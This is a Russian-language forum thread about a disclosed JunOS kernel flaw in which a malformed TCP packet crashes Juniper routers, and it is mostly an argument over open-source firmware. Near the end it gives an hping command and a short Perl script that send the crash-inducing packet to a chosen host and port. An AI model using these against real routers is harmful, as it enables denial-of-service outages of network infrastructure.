Компания Juniper Networks объявила (http://praetorianprefect.com/archives/2010/01/junos-juniper-.../) об обнаружении уязвимости в ядре операционной системы JunOS, под которой работают большинство маршрутизаторов Juniper. Посылка специально сформированного TCP пакета (с неправильно оформленной заглавной частью) на открытый порт самого маршрутизатора вызывает крах ядра, ведущий за собой рестарт устройства. Встроенный межсетевой экран не в состоянии "поймать" и изолировать такой пакет.
Проблеме подвержены почти все версии JunOS, начиная с 5.3.5 p0-2 и заканчивая 9.0R1.1 (полныю список приводится здесь (http://www.securityfocus.com/bid/37670)). По словам Juniper Networks, проблема обнаружена самой компанией во время проверки на совместимость с оборудованием других производителей. Подробностей по поводу того каким образом должен быть сформирован пакет не сообщается. По неофициальным данным, обновление будет доступно в понедельник, 11 января.
URL: http://praetorianprefect.com/archives/2010/01/junos-juniper-.../
Новость: http://www.opennet.me/opennews/art.shtml?num=24941
С учетом того, что в JunOS используется код FreeBSD, нет ли подобной дыры в других *BSD системах ?
Фряшный код используется не во всех подсистемах. Деталей не помню, но есть вероятность, что сетевая как раз своя. Или, как минимум, была обработана напильником.
Была бы свободная прошивка, накатил патч, а тут ждать когда они обновят прошивку и не факт что еще все дыры залатали...
У d-link свободная прошивка, попробуй накатай патч.
>У d-link свободная прошивка, попробуй накатай патч.У меня именно таким манером в свое время был Д-линк ... с прошивкой от сторонних авторов (McMcc). Да и на ряд длинков с эзернетом нынче подходят прошивки "от Олега". Кстати вполне обычна ситуация когда дыры и назойливые баги (вплоть до ляпов не позволяющих юзать девайс в нужной конфигурации вообще, как это бывало с типовой для России связкой DHCP+PPTP например) в сторонних прошивках фиксятся шибко быстрее чем раздуплятся вендоры. И это большой плюс опенсорсных прошивок. Можно сосать месяцами, менять два десятка девайсов, прыгать с бубном и прочая. А можно влить фирмваре от местных спецов, которые в вопросе разбираются и в курсе "национальных особенностей" и через 10 минут все будет работать. Лучше чем оригинал, как правило. Ну да, бздунам с их всеобщим счастьем для закрывателей сорсов такое ессно не светит. Пусть наслаждаются своими блобами и тотальной зависимостью от вендора с невозможностью без большого траха исправить самолично жалкие пару байтов чтобы исправить какую-то вот такую вот хрень.
осподи, опять крышу снесло от букв bsd?ps. а что делать, если не будет очередного Олега, а юзер? ты сам готов прошивку писать?
а то вот например сейчас очень популяы насы на линухе, а вот прошивок для них как-то тухло. чего бы не приложиться?
а его уже как полтора года нет.
нашлись другие - http://code.google.com/p/wl500g/
проблем то. там то его собрать, что бзишнегу мир.
>а то вот например сейчас очень популяы насы на линухе, а вот прошивок для них как-то тухло. чего бы не приложиться?давай насу. приложусь.
зы:
крышу то держи. а то с выдувает всё то из под неё то.
>а его уже как полтора года нет.
>нашлись другие - http://code.google.com/p/wl500g/
>проблем то. там то его собрать, что бзишнегу мир.
>>а то вот например сейчас очень популяы насы на линухе, а вот прошивок для них как-то тухло. чего бы не приложиться?
>
>давай насу. приложусь.
>
>зы:
>крышу то держи. а то с выдувает всё то из под неё
>то.идешь на сайт интела и берешь прошивку. все просто. правда энтузиастам пока почему то не удалось сделать свою.
http://www.intel.com/support/ru/motherboards/server/ss4000-e/ - вот оно. как то пока "Олега" на это устройство не наблюдается.
а что касаемо крыши - так я же не бегаю по топикам, где светятся буквы gpl и не поливаю говном ее использующих.
А в чем было поливание говном? Я констатировал факт что при наличии сорсов тупые баги зачастую чинятся локально куда быстрее чем пока там снимется с тормоза вендор. Это теперь уже считается за поливание говном? Да вы совсем уж с дуба рухнули с вашим фанатизмом. Ну да, конечно, орать про свободу на форуме - это одно, а починить тупой баг в фирмваре по быстренькому - другое. Как по мне - предпочитаю фактическую свободу вместо громких деклараций о всеобщем счастье.
>
>идешь на сайт интела и берешь прошивку. все просто. правда энтузиастам пока
>почему то не удалось сделать свою.
>
>http://www.intel.com/support/ru/motherboards/server/ss4000-e/ - вот оно. как то пока "Олега" на это устройство не
>наблюдается.
>а оно надо этому девайсу?
с вайфаем -- была острая необходимость. здесь то что?
>>
>>идешь на сайт интела и берешь прошивку. все просто. правда энтузиастам пока
>>почему то не удалось сделать свою.
>>
>>http://www.intel.com/support/ru/motherboards/server/ss4000-e/ - вот оно. как то пока "Олега" на это устройство не
>>наблюдается.
>>
>
>а оно надо этому девайсу?
>с вайфаем -- была острая необходимость. здесь то что?а здесь - потрясающе низкая скорость работы сетевого накопителя.
> ps. а что делать, если не будет очередного Олега, а юзер? ты сам готов прошивку писать?Я осваиваю OpenWRT и связанные с ним околосистемные дела. Весьма осмысленная такая штука - как раз для создания на его основе своих прошивок под свои вкусы и цели. Мне нравится. И с нуля ничего писать не надо, в общем то. Велосипедостроение - удел проприетарщиков и жлобов. Базовых платформ - не так уж и много и какая-никакая поддержка оных уже вколупана. Да, ессно мне до высот как у матерых системщиков пока далековато. Но в конце концов не боги горшки обжигают. Предпочитаю учиться что-то делать сам чем подлизывать "божкам" из [тут проприетарная контора по вкусу] в надежде на их милость. Попробовав и так и сяк пришел к выводу что так мне нравится больше.
> а вот прошивок для них как-то тухло. чего бы не приложиться?
Ну, кому интересно это направлене - в своем праве поприкладываться. Я пока подсел на OpenWRT, а это все-таки не NAS. Да и где-то на уровне интуиции понятно что NAS как класс soho девайсов вероятно умрет - ИМХО интеграция в SOHO вскоре вгонит все в 1 универсальный девайс вида "роутер + wi-fi + HDD". Как в свое время умерли КПК в пользу более интегренных коммуникаторов. Если Marvell запозиционирует свои процы как платформу для роутерообразных штук и у меня будет такая железяка - я с удовольствием с ней покопаютсь. А в данный момент мне и так есть где приложиться.
"Ну да, бздунам с их всеобщим счастьем для закрывателей сорсов такое ессно не светит" - то есть это взвешенный и аргументированный коммент?
Да, кой-в чем вы правы: надо стараться избегать таких оборотов провоцирующих на колкости в ответ. Однако со своей стороны замечу что меня интересуют технические моменты а не кидание какашками и выяснение какие козлы собеседники. И вот в этом плане я что-то внятных контр-аргументов не вижу.Зато рассказать мне какой я козел - это всегда пожалуйста.
>Да, кой-в чем вы правы: надо стараться избегать таких оборотов провоцирующих на
>колкости в ответ. Однако со своей стороны замечу что меня интересуют
>технические моменты а не кидание какашками и выяснение какие козлы собеседники.
>И вот в этом плане я что-то внятных контр-аргументов не вижу.Зато
>рассказать мне какой я козел - это всегда пожалуйста.ну я бы сказал, что подобная реакция заслуженна определенным поведением, разве нет?
опять же - никакая лицензия не заставит выпустить производителя выпускать обновления быстро. то есть в данном случае я не вижу связи между сообществом freeBSD и выпуском джунипером обновлений. так же, например, как между длинком, выпускающем soho-роутеры на линухе, и боте-нете на оных и собственно самим линухом.
>ну я бы сказал, что подобная реакция заслуженна определенным поведением, разве нет?Как
>опять же - никакая лицензия не заставит выпустить производителя
>выпускать обновления быстро.Да, вот только для длинков и асусов всяких, с их GPL - желающие сами могут запатчить большинство ляпов. Посему те кто не хочет быть рассадником ботов, глюков, багв и делать вендору годами минет в надежде что все это может быть починят (а может быть и нет, какие гарантии то?) - получают шанс потрепыхаться сами. И я не понимаю какого хрена у них за их бабки этого шанса быть не должно.
>то есть в данном случае я не вижу связи между сообществом
>freeBSD и выпуском джунипером обновлений.Именно. Между сообществом и вендором связи никакой. И на самом деле это - dead way. Коллаборативная работа над проблемой - заруливает растаскивание по углам с большим отрывом.
>так же, например, как между длинком, выпускающем soho-роутеры на линухе,
>и боте-нете на оных и собственно самим линухом.В случае линуха - если мне влом быть куском ботнета, я могу накрайняк переколупать фирмваре сам, возможно с целой групкой тех кто считает так же. Откусив или починив проблемный функционал. И даже могу раздать фирмваре другим. Мне это как-то более симпатично в таком виде, если что.
>>ну я бы сказал, что подобная реакция заслуженна определенным поведением, разве нет?
>
>Как
>как заслуженна? еще раз отрывок из коммента выше напомнить? :)
>>опять же - никакая лицензия не заставит выпустить производителя
>>выпускать обновления быстро.
>
>Да, вот только для длинков и асусов всяких, с их GPL -
>желающие сами могут запатчить большинство ляпов. Посему те кто не хочет
>быть рассадником ботов, глюков, багв и делать вендору годами минет в
>надежде что все это может быть починят (а может быть и
>нет, какие гарантии то?) - получают шанс потрепыхаться сами. И я
>не понимаю какого хрена у них за их бабки этого шанса
>быть не должно.то устройство, на которое я ссылался, тоже на линухе с gpl. и?
>>то есть в данном случае я не вижу связи между сообществом
>>freeBSD и выпуском джунипером обновлений.
>
>Именно. Между сообществом и вендором связи никакой. И на самом деле это
>- dead way. Коллаборативная работа над проблемой - заруливает растаскивание по
>углам с большим отрывом.ну во первых, неизвестно, проблема это самой фри или доработок напильником джунипера. это раз. второе - в случае сильной доработки напильником и невозвращения изменений производитель рискует остаться на бобах - с каждым изменением ему приходиться пилить заново. знаю парочку таких контор - одни на линухе, другие на фре - обе используют версии 10летней давности.
>
>>так же, например, как между длинком, выпускающем soho-роутеры на линухе,
>>и боте-нете на оных и собственно самим линухом.
>
>В случае линуха - если мне влом быть куском ботнета, я могу
>накрайняк переколупать фирмваре сам, возможно с целой групкой тех кто считает
>так же. Откусив или починив проблемный функционал. И даже могу раздать
>фирмваре другим. Мне это как-то более симпатично в таком виде, если
>что.я не про это. да, мне тоже больше нравиться открытость и возможность настроить железку так, как надо мне, а не стандартному пользователю. но это уже не в контексте обсуждаемой проблемы.
>Если Marvell запозиционирует
>свои процы как платформу для роутерообразных штук и у меня будет
>такая железяка - я с удовольствием с ней покопаютсь. А в
>данный момент мне и так есть где приложиться.Так покопайтесь с Time Capsule - внутри 100% Marvell
>Так покопайтесь с Time Capsule - внутри 100% MarvellЭто чего-то яббловское как я понял? От продукции яббла я предпочитаю держаться подальше, слишком уж противный и ограничительный вендор, даже хуже MS имхо, т.к. задранные цены + в их железках всегда найдется какая-то пакость которая отравит удовольствие от обладания девайсом. Да и если у вас нет мака (а мне и без него хорошо) - яббловские железки обычно не слишком ориентированы на всех остальных. Вот если несколько более-менее нейтральных вендоров начнут юзать платформу для роутеров, я к ней присмотрюсь, факт.
P.S. а вообще, честное пионерское, мне есть с чем поковыряться в свое удовольствие и я в состоянии выбрать себе предметы ковыряния сам. Без всяких ябблов на горизонте.
йо. ваше маниакальное стремление пересадить всех на опенсорц напоминает РМС. хотите использовать в ядре сети железку с прошивкой "от олега" - ваше дурное право. но пропагандировать свою дурь это уж через чур. да, кстати. сетевые железки - большой бизнес. а в бизнесе не будет ничего открытого, ибо конкуренция и коммерческая тайна.
>У d-link свободная прошивкаВ каком месте? ftp://dlink.ru/pub/ как-то не на что не наблюдается.
А в ftp://dlink.ru/pub/ADSL/GPL_source_code/ интересно чего? :)
А так - да, некоторые типа длинка довольно раздолбайски относятся к выкладыванию сорсов. Потому то и есть всякие GPLviolations.org :)
Видео:
http://praetorianprefect.com/archives/2010/01/junos-juniper-.../
да. Ынтерпрайз баги, классика... классика, конечно, пинг смерти, но и это сойдёт
>Подробностей по поводу того каким образом должен быть сформирован пакет
>не сообщается.Можно попробовать подойти к вопросу с точки зрения комбинаторики.
Нагенерить 2 в степени n пакетов и поотсылать их устройству.
На каком пакете упадет, тот левый)
А чему равно n? А то скажем 2^128 пакетоы вы обломитесь послать пожалуй :)
посмотрел видео, попробовал. там в описании ошибка небольшая. но все работает
hping -c 1 -p 23 -L 0 -M 0 192.168.10.210 -S -E ./jun/1012 -d 10 -O 7
убивает 9й джун наповал.
А можно содержимое файлика /jun/1012. Всё равно 23-й порт закрыт от обычных пользователей.
>А можно содержимое файлика /jun/1012. Всё равно 23-й порт закрыт от обычных
>пользователей.увы не скажу, так как даже если порт закрыт ACL то все равно джунипер валится. Попробуйте почитать исходную новость и попробовать самим подобрать содержимое файла
Ясно. Тогда я не оценил масштабов трагедии.
Если не сложно можно связаться с Вами для уточнения содержимого пакета, так как подбор не помог и Жунипер не отреагировал, встает вопрос версия не восприимчива или просто не правильно сформирован пакет?
#!/usr/bin/perlmy $host = shift;
my $port = shift;use Net::Packet qw($Env);
use Net::Packet::IPv4;
my $ip = Net::Packet::IPv4->new(dst => $host);use Net::Packet::TCP;
my $tcp = Net::Packet::TCP->new(
dst => $port,
options => "\x65\x02\x01\x01",
);use Net::Packet::Frame;
my $frame = Net::Packet::Frame->new(l3 => $ip, l4 => $tcp);$frame->send;
exit 0;